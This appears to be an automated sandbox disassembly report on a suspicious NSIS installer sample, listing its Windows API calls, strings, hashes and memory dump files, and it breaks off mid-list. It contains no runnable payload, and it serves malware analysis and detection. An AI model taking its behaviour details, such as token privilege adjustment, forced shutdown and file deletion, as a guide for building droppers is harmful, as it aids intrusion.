Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abbina",?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, abbina",?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?, abbina",00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

C:\Users\user\Desktop\7uY105UTJU.exe, xrefs: 00403A2F
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 004037FA, 0040391C, 00403969, 00403977
C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret, xrefs: 00403927
TMP, xrefs: 00403862
TEMP, xrefs: 0040385A
1033, xrefs: 00403876
SeShutdownPrivilege, xrefs: 00403AD8
Low, xrefs: 00403848
~nsu%X.tmp, xrefs: 004039A8
abbina", xrefs: 00403994, 004039C5, 004039E3, 004039EF, 00403A2E, 00403A40, 00403A6D
Error launching installer, xrefs: 004038FD
"C:\Users\user\Desktop\7uY105UTJU.exe", xrefs: 004036AA, 004036B0, 004036C5, 004038A3
UXTHEME, xrefs: 00403620, 00403625, 0040362B
NSIS Error, xrefs: 00403695
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26
C:\Users\user\Desktop, xrefs: 00403972
\Temp, xrefs: 0040382C

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: abbina"$"C:\Users\user\Desktop\7uY105UTJU.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret$C:\Users\user\Desktop$C:\Users\user\Desktop\7uY105UTJU.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2990362908
Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNELBASE(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

pB, xrefs: 00405CBC
"C:\Users\user\Desktop\7uY105UTJU.exe", xrefs: 00405C6C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
\*.*, xrefs: 00405CCE

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\7uY105UTJU.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-3923853200
Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Strings

C:\Users\user\AppData\Local\Temp\nsr144.tmp, xrefs: 004068B4

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsr144.tmp
API String ID: 2295610775-3622376432
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\7uY105UTJU.exe",00008001), ref: 00403CAA
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420), ref: 00403D2A
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

.DEFAULT\Control Panel\International, xrefs: 00403C95
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00403CB9, 00403CC1, 00403D64, 00403D6A, 00403D7A
RichEd20, xrefs: 00403E57
1033, xrefs: 00403C49, 00403CA5
RichEd32, xrefs: 00403E65
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
RichEdit, xrefs: 00403E84
"C:\Users\user\Desktop\7uY105UTJU.exe", xrefs: 00403C2C
RichEdit20W, xrefs: 00403E75, 00403E7B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E
.exe, xrefs: 00403D37
_Nb, xrefs: 00403DAD, 00403E15
: Completed, xrefs: 00403CF1, 00403CFA, 00403D08, 00403D57, 00403D5D

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\7uY105UTJU.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-162031440
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\7uY105UTJU.exe,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\7uY105UTJU.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\7uY105UTJU.exe,C:\Users\user\Desktop\7uY105UTJU.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

C:\Users\user\Desktop\7uY105UTJU.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
soft, xrefs: 00403170
Error launching installer, xrefs: 004030D2
"C:\Users\user\Desktop\7uY105UTJU.exe", xrefs: 00403088
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
Inst, xrefs: 00403167
Null, xrefs: 00403179
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\7uY105UTJU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\7uY105UTJU.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3268751720
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 0040675E
lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 004067B8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
antholite, xrefs: 004065B8
: Completed, xrefs: 004065C1, 0040667B, 00406682, 00406686, 0040669F, 004066A0, 004066B5, 004066CB, 004066FC, 00406728, 0040675D, 00406763, 00406780, 00406793, 004067B1, 004067B7, 004067C0, 004067F5

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
